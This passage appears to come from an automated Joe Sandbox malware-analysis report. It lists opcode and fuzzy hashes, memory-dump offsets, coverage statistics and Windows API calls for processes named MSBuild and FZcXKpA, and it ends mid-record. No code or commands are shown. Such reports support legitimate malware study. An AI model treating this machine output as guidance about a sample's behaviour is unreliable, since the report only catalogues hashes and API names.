                                                                                                                              • Opcode ID: d44b05fcbfcc8ba317cb8ee8c8c0fdc3d9ba6b0669cab9a3f1cb7e6bdc31b8ca
                                                                                                                              • Instruction ID: 2ada59699e3c0fbe2fe9590dfcb57f03b675f1f86486297166d517ab3e97abe8
                                                                                                                              • Opcode Fuzzy Hash: d44b05fcbfcc8ba317cb8ee8c8c0fdc3d9ba6b0669cab9a3f1cb7e6bdc31b8ca
                                                                                                                              • Instruction Fuzzy Hash: D491CE70704201CFDB15AF69D894BBE7BE2AB88304F148869E4168B396DF388E46D795
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 95f056a3206dada3d127b174ec712f2ae7c6076806aadd247bb9ad1ae88da253
                                                                                                                              • Instruction ID: 156b703f3c322d7600355f98f5a0e7b9801b97708062e91a568a224eb005e32b
                                                                                                                              • Opcode Fuzzy Hash: 95f056a3206dada3d127b174ec712f2ae7c6076806aadd247bb9ad1ae88da253
                                                                                                                              • Instruction Fuzzy Hash: D6819C34B00505DFCB24CF69C4849EABBB2BF89304F258169E416EB365DB39EC45CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b4ea97ee0e0be3d1f10ce80aa42d4ea0c90c7e1fadf32470444497c2660e91f1
                                                                                                                              • Instruction ID: ab1edf69ba727f88733e0825780a4a44aa1d241cbc426713400848cbe589c52a
                                                                                                                              • Opcode Fuzzy Hash: b4ea97ee0e0be3d1f10ce80aa42d4ea0c90c7e1fadf32470444497c2660e91f1
                                                                                                                              • Instruction Fuzzy Hash: 537135347006058FCB15DF69C888AAE7BEAAF99700F1540A9E826DB3B1DF70DD45CB51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b9d967a4c8bdc98171891399dc398a4e86e7400390b369a795f891a106d76f3d
                                                                                                                              • Instruction ID: d23aeef622c59d5fe4a5eed1bc10ce9bd2d46ffd94f97e93fca4c865b25b4f73
                                                                                                                              • Opcode Fuzzy Hash: b9d967a4c8bdc98171891399dc398a4e86e7400390b369a795f891a106d76f3d
                                                                                                                              • Instruction Fuzzy Hash: 3F510F74D05248CFDB04DFA9D8846EDBBF1BF49301F24852AE855AB3A5DB349A06CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 436c1c31723f8a8605be70f457f198804ffae2644c3265789efd24d278518dea
                                                                                                                              • Instruction ID: c1012dc700c56d47b76c9ac9e6615b181ea5ca1ab155d48845ec98b8142fafd3
                                                                                                                              • Opcode Fuzzy Hash: 436c1c31723f8a8605be70f457f198804ffae2644c3265789efd24d278518dea
                                                                                                                              • Instruction Fuzzy Hash: 3E518274E01208CFCB48DFA9D59499DBBF2FF89310B209569E809AB365DB35A942CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cda352845e843f4e76f57d06fa7bb7339f4d132b9be3a2f52a8774152a2c149d
                                                                                                                              • Instruction ID: c519a5c67eb47c577dd3397fcb4a20130bc64c217f51c46447bad548d660f268
                                                                                                                              • Opcode Fuzzy Hash: cda352845e843f4e76f57d06fa7bb7339f4d132b9be3a2f52a8774152a2c149d
                                                                                                                              • Instruction Fuzzy Hash: 7B518274E01208CFCB48DFA9D59499DBBF2FF89310B209469E809AB365DB35A942CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: be24f2bc3a4064eb8586ae2a0e5f0fa29e5e746dd635ee3320593b360e5d6027
                                                                                                                              • Instruction ID: c9c3b7b5f0d0f44bdcaf05bad85e9943c0a5d8fef20fe3160d012c7cf83c7f65
                                                                                                                              • Opcode Fuzzy Hash: be24f2bc3a4064eb8586ae2a0e5f0fa29e5e746dd635ee3320593b360e5d6027
                                                                                                                              • Instruction Fuzzy Hash: 47518474E01208DFDB58DFAAD5849DDBBF2BF89300F209169E819AB365DB319945CF10
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 129254e23403c145ff3d32626b17d2f3a93667b0bbca8f7a7cb62560d5a1dd71
                                                                                                                              • Instruction ID: df932315435bf4298a40b03eb5a8abfa195d2ae77220cc40f1e009caa01da2bc
                                                                                                                              • Opcode Fuzzy Hash: 129254e23403c145ff3d32626b17d2f3a93667b0bbca8f7a7cb62560d5a1dd71
                                                                                                                              • Instruction Fuzzy Hash: 9A41AF31A04249DFCF11CFA8C884ADDBFB2AF49310F148556E9959B2A1D370DE14CF62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 93ba1d42e5975e8170eecf0fd28cc33c5848c38b329c2c658945062c97ee0bbe
                                                                                                                              • Instruction ID: b30a18bfafeaea98562168af7c86d77a78b79353215116f8f4ff7f4f3ff6b00a
                                                                                                                              • Opcode Fuzzy Hash: 93ba1d42e5975e8170eecf0fd28cc33c5848c38b329c2c658945062c97ee0bbe
                                                                                                                              • Instruction Fuzzy Hash: EC310731B102A58BDF1C46BA88942FEBAAAABC4300F244439D916D3394DF74CF4597A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 742b32d3bd92f05f12aa1634a05e8285cac701d8bf1e735cd3919040b4868179
                                                                                                                              • Instruction ID: 5d7308b8aa99e4490cadc87bbd963b35e1471ad4b5192b2173150ce58d8e8f6e
                                                                                                                              • Opcode Fuzzy Hash: 742b32d3bd92f05f12aa1634a05e8285cac701d8bf1e735cd3919040b4868179
                                                                                                                              • Instruction Fuzzy Hash: CC419130704245CFDB01DF6AC884BAB7BE6EF89301F548866EA18CB2A6D775DD05CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c19c3c8434b5f4b1fc14811539a3d883d1cedeed2f8ddff612080022c440809c
                                                                                                                              • Instruction ID: 29be8d5496e91213a03b6b7d3a00c164e4eea30fe133559f61acc2533aad082f
                                                                                                                              • Opcode Fuzzy Hash: c19c3c8434b5f4b1fc14811539a3d883d1cedeed2f8ddff612080022c440809c
                                                                                                                              • Instruction Fuzzy Hash: 3E31E430304141CFDB259BA9D8906BE7B6FAF85700F2448AAF022CB292EF39CD49C755
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f25fa2a58873fc6faee596b213e896edefd4982a2b78403dc7264eb9fbbf78ea
                                                                                                                              • Instruction ID: 03971125fd8f3b0dedd973c3a56fc1bf490cc7af1061ef74e014a80c624e365d
                                                                                                                              • Opcode Fuzzy Hash: f25fa2a58873fc6faee596b213e896edefd4982a2b78403dc7264eb9fbbf78ea
                                                                                                                              • Instruction Fuzzy Hash: B1319D71701649DFCB019F64D894AAF3BB2EB88314F008464F91597384DB35CEA5EBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ab121b0046798ed0ff75157761d04566af2a773b83b7180bcbd0c4dd8c34ad07
                                                                                                                              • Instruction ID: 86dc2431e3be3cadaafa07a0597f98418d22743dfd1f46966e84b919b262d8b9
                                                                                                                              • Opcode Fuzzy Hash: ab121b0046798ed0ff75157761d04566af2a773b83b7180bcbd0c4dd8c34ad07
                                                                                                                              • Instruction Fuzzy Hash: 6511B074D1120ACFCB40EFA9D9845EEBBF0BB49310F10556AD905B2214EB305A95CF91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ec0aac84699b2642d16cdc140f68eee2f4fe4be36f0d34942b22848b419d5a2
                                                                                                                              • Instruction ID: 708068e89a95fec6e44cfc036d801707871a43279892da65dbcc17c45ef335c2
                                                                                                                              • Opcode Fuzzy Hash: 9ec0aac84699b2642d16cdc140f68eee2f4fe4be36f0d34942b22848b419d5a2
                                                                                                                              • Instruction Fuzzy Hash: F20128317443108F87165A2E945466E7BEAEFC9B55B19807AE959CB372EE32CD02C341
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 06444fe28d6388af1d77c2a9daefa7de8a1d22bd2b0720cbe508b4cf624771cd
                                                                                                                              • Instruction ID: 9dded999504ca9f8ea9a4eb40787d34ec153d8ad5af2cf67d18467410fe1dd83
                                                                                                                              • Opcode Fuzzy Hash: 06444fe28d6388af1d77c2a9daefa7de8a1d22bd2b0720cbe508b4cf624771cd
                                                                                                                              • Instruction Fuzzy Hash: 9CF068353001156FDB181EAA98509BBBBDBEBCD3A0F148429BB09C7351DE71CD1293A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 879928c34b123c4643081f2fd8c950d8f624a81d6b7cee4e5c9d4899ce2c1424
                                                                                                                              • Instruction ID: afd6cfb82faafab440da37bbfa0db2202c3397235e6c9215417b6523b8329984
                                                                                                                              • Opcode Fuzzy Hash: 879928c34b123c4643081f2fd8c950d8f624a81d6b7cee4e5c9d4899ce2c1424
                                                                                                                              • Instruction Fuzzy Hash: 350116B8D0020AEFCB40DFA4E844ABEBBB1FB48300F10856AD914A3354D7715A16DF92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d188d91f39a095a38309218a1c5997577e799d7d6b91e303aae7fb6d7e2e18c6
                                                                                                                              • Instruction ID: ff171fd06434cf9f03d52848828ec64a89fbc6bd7be7553332e9c69a29c7400e
                                                                                                                              • Opcode Fuzzy Hash: d188d91f39a095a38309218a1c5997577e799d7d6b91e303aae7fb6d7e2e18c6
                                                                                                                              • Instruction Fuzzy Hash: 32F08271E001189FCB108F6A9844AEEBBB5EBC8320F10C126EA18C3215D6314A158B50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a017e244ef14bf8acde9728b2386e299ac575a4c62ef56d263437b20aab372ca
                                                                                                                              • Instruction ID: 2a8789da9b01891614e63e737507e135f6a4a814e6dadf679fcdb0a7443ada8f
                                                                                                                              • Opcode Fuzzy Hash: a017e244ef14bf8acde9728b2386e299ac575a4c62ef56d263437b20aab372ca
                                                                                                                              • Instruction Fuzzy Hash: 3AF03076644144EFCB018F95EC90ADDBFB2FF8D311F184496EA11AB261C6319925CB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0e4ce5a5311844f08b9aba7d5f66d412b95605c3c5af4d23ba9a2382ce6f25e7
                                                                                                                              • Instruction ID: 2cebb9f68693408a8f487cb509be90f706d891cdbdc4734e0eff346b02bd0101
                                                                                                                              • Opcode Fuzzy Hash: 0e4ce5a5311844f08b9aba7d5f66d412b95605c3c5af4d23ba9a2382ce6f25e7
                                                                                                                              • Instruction Fuzzy Hash: BEE08636D65767CACB02E7B0AC400FEFB34ADD5211B59455BC06136191EB30265EC7A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: be33620617ec0d5ee201fca93c66bc6654238247eaff376702c7fb0b48c7dea2
                                                                                                                              • Instruction ID: 76d11c61ae604af78a2df147a7dd9ff603c47e304809cef8dd32cb21c2aae4f9
                                                                                                                              • Opcode Fuzzy Hash: be33620617ec0d5ee201fca93c66bc6654238247eaff376702c7fb0b48c7dea2
                                                                                                                              • Instruction Fuzzy Hash: 16D05B31D2126B57CB00E7A5DC044EFF738EED5661B544626D51437140FB702659C7E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6a31ea08ae54f1c8eafb03513e689673ff14ccab3c309004adcc41b551fb0571
                                                                                                                              • Instruction ID: 15aa513b8dc34a5068c610393ded3864dd9ce624782f013ab041d4d5c119a4d9
                                                                                                                              • Opcode Fuzzy Hash: 6a31ea08ae54f1c8eafb03513e689673ff14ccab3c309004adcc41b551fb0571
                                                                                                                              • Instruction Fuzzy Hash: 47E0123054D3CADFD603B374A88046A7F72AA83214B1999E5D0404EAAFDD35499ECF61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
                                                                                                                              • Instruction ID: 26642a36d1c80bbe4b8a3b3b8b2f6947f0c11d639e61f8dc9764ec18e1e937a8
                                                                                                                              • Opcode Fuzzy Hash: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
                                                                                                                              • Instruction Fuzzy Hash: EEC0123364D0642DAB3510AE7C81AFB9B5EC3C13B4E25027BF9ACE32009C424C8A82A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 56df5004b4fa5303b8781a978b6dbbe65d10aca67e02d507147a708f289e5af7
                                                                                                                              • Instruction ID: f5680926ef876074b93702a2bd342cc9803c6f4be2b897d987d26d66df202758
                                                                                                                              • Opcode Fuzzy Hash: 56df5004b4fa5303b8781a978b6dbbe65d10aca67e02d507147a708f289e5af7
                                                                                                                              • Instruction Fuzzy Hash: FCD0673AB40108DFCB049F99E8809DDF776FB98221B04C516F925A3264C6319925DB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8e608c3ae70185bcc594d9e2ad8974d3890ff9d769f8836c88a68af30fe54cda
                                                                                                                              • Instruction ID: a161bf38b8b453520fea4b7dc79d527868e4621634a7e465d22d105e1d42c61c
                                                                                                                              • Opcode Fuzzy Hash: 8e608c3ae70185bcc594d9e2ad8974d3890ff9d769f8836c88a68af30fe54cda
                                                                                                                              • Instruction Fuzzy Hash: 1DC0123040470ECED501F765FC455597B3AE6802047909554A1050965DEE7459DA5A94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8042c7bcddece7ecce6638b6d1a166d83748a1420ae9741b5a05172cad2df8bc
                                                                                                                              • Instruction ID: 2e2eee76517009b023a58623a9d24a3a9b0709d262d2e7c569410f7a43c2c4fc
                                                                                                                              • Opcode Fuzzy Hash: 8042c7bcddece7ecce6638b6d1a166d83748a1420ae9741b5a05172cad2df8bc
                                                                                                                              • Instruction Fuzzy Hash: F3C17F74E01218CFEB14DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2c5d41f2d53a151cf07ab3705d102706d1ba11ce6371c3a701e989447764308b
                                                                                                                              • Instruction ID: 7275530de6316e4e888afc315cf06831380a8791d7995e0e93f83b0c9f29709e
                                                                                                                              • Opcode Fuzzy Hash: 2c5d41f2d53a151cf07ab3705d102706d1ba11ce6371c3a701e989447764308b
                                                                                                                              • Instruction Fuzzy Hash: A351ED70D05208CBEB14EFA8D885BEEBBF2BB49300F209169D419BB395D7759982CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 13a488b61455b0bac2da2ee9b6633a5f9a18f65f7731a0261e7c0adc1b898aa0
                                                                                                                              • Instruction ID: ac227cd037c9ae64b49aa9d6b193f9aef1954e2de319b0b7d47d424a8b534855
                                                                                                                              • Opcode Fuzzy Hash: 13a488b61455b0bac2da2ee9b6633a5f9a18f65f7731a0261e7c0adc1b898aa0
                                                                                                                              • Instruction Fuzzy Hash: B3513670D05208DBEB14EFA9D8857EEB7F2BB88300F249129D414BB399DB759982CF54

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.7%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:139
                                                                                                                              Total number of Limit Nodes:17

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 016ED3BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 016ED3FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 016ED438
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 016ED491
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 261f937b9fcb3b9ad4800118ce4f8f252b69420f1ba44e2c03507cae01e52272
                                                                                                                              • Instruction ID: 7f7314fcd155f4c504c13c224d6fd296dd7932c11f86b954092e448f8629fced
                                                                                                                              • Opcode Fuzzy Hash: 261f937b9fcb3b9ad4800118ce4f8f252b69420f1ba44e2c03507cae01e52272
                                                                                                                              • Instruction Fuzzy Hash: 9C5156B0901349CFEB14DFA9D9487DEBBF1BF88304F248459D519AB3A0DB34A944CB65

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 016ED3BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 016ED3FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 016ED438
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 016ED491
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 9ab119b926b4bb8cd400b05480fe86243837651c9241b99b0b71111ca602a3a6
                                                                                                                              • Instruction ID: cd86e70ff49beaa7bfff67cfab9df2d21ba7a0012a2ffc10d3c4ed638efe4b11
                                                                                                                              • Opcode Fuzzy Hash: 9ab119b926b4bb8cd400b05480fe86243837651c9241b99b0b71111ca602a3a6
                                                                                                                              • Instruction Fuzzy Hash: C65145B0901349CFDB14DFAAD948BDEBBF1BB88314F208459E519A7360D734A944CB65

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076BECCE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: c6870d5a18a54ea35dfd0afbaf69aa131fe96afb2311beeddad0463adbc32b9b
                                                                                                                              • Instruction ID: c69d022d8c7db68993d823a9a0b5c35ac08c8c04fd67c4068201269ca10c10c2
                                                                                                                              • Opcode Fuzzy Hash: c6870d5a18a54ea35dfd0afbaf69aa131fe96afb2311beeddad0463adbc32b9b
                                                                                                                              • Instruction Fuzzy Hash: 31917EB1D0021ADFEF20DF68C841BEDBBB2BF45310F1485A9D81AA7240DB759985CF91

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 016EB2FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 2f002711fbc15f627f2e4a9147485c73e3ba489d74dd33aee035c11348a6d7f7
                                                                                                                              • Instruction ID: 4f019f74e03da587cfe390a0afe2dcbdc52be018eff93a6889617782deb2b758
                                                                                                                              • Opcode Fuzzy Hash: 2f002711fbc15f627f2e4a9147485c73e3ba489d74dd33aee035c11348a6d7f7
